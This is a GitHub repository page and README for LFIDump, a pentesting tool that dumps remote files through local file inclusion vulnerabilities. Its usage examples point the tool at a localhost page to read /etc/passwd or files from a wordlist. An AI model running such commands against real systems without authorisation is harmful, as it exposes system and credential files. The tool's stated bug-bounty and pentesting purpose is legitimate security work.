https://github.com/p0dalirius/lfidump

A simple python script to dump remote files through a local file read or local file inclusion web vulnerability.
https://github.com/p0dalirius/lfidump

bugbounty dump file inclusion local pentesting

Last synced: 16 days ago
JSON representation

A simple python script to dump remote files through a local file read or local file inclusion web vulnerability.

• Host: GitHub
• URL: https://github.com/p0dalirius/lfidump
• Owner: p0dalirius
• Created: 2022-02-01T11:37:13.000Z (almost 3 years ago)
• Default Branch: master
• Last Pushed: 2024-03-16T08:21:05.000Z (8 months ago)
• Last Synced: 2024-05-01T17:26:42.721Z (7 months ago)
• Topics: bugbounty, dump, file, inclusion, local, pentesting
• Language: Python
• Homepage: https://podalirius.net/
• Size: 1.33 MB
• Stars: 61
• Watchers: 4
• Forks: 13
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • Funding: .github/FUNDING.yml

Awesome Lists containing this project

README

        
![](./.github/banner.png)



    A simple python script to dump remote files through a local file read or local file inclusion web vulnerability.

    


    

    

    

    




![](./.github/example.gif)

## Features

 - [x] Dump a single file with `-f /path/to/remote/file.txt`

 - [x] Dump lots of files from a wordlist with `-F /path/to/local/wordlist.txt`

 - [x] Insecure mode (for broken SSL/TLS) with `-k/--insecure`

 - [x] Custom local dump dir with `-d/--dump-dir`

## Usage

```

$ ./LFIDump.py -h

usage: LFIDump.py [-h] [-v] [-s] -u URL [-f FILE | -F FILELIST] [-D DUMP_DIR] [-k]

Description message

optional arguments:

  -h, --help            show this help message and exit

  -v, --verbose         Verbose mode. (default: False)

  -s, --only-success    Only print successful read file attempts.

  -u URL, --url URL     URL to connect to. (example: http://localhost/?page=LFIPATH)

  -f FILE, --file FILE  Remote file to read.

  -F FILELIST, --filelist FILELIST

                        File containing a list of paths to files to read remotely.

  -D DUMP_DIR, --dump-dir DUMP_DIR

                        Directory where the dumped files will be stored.

  -k, --insecure        Allow insecure server connections when using SSL (default: False)

```

## Examples

 + Dump a single file

    ```

    ./LFIDump.py -u "http://localhost:8000/lfi.php?page=LFIPATH" -f /etc/passwd

    ```

   

 + Dump files from a wordlist

    ```

    ./LFIDump.py -u "http://localhost:8000/lfi.php?page=LFIPATH" -F ./wordlists/all.txt

    ```

## Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.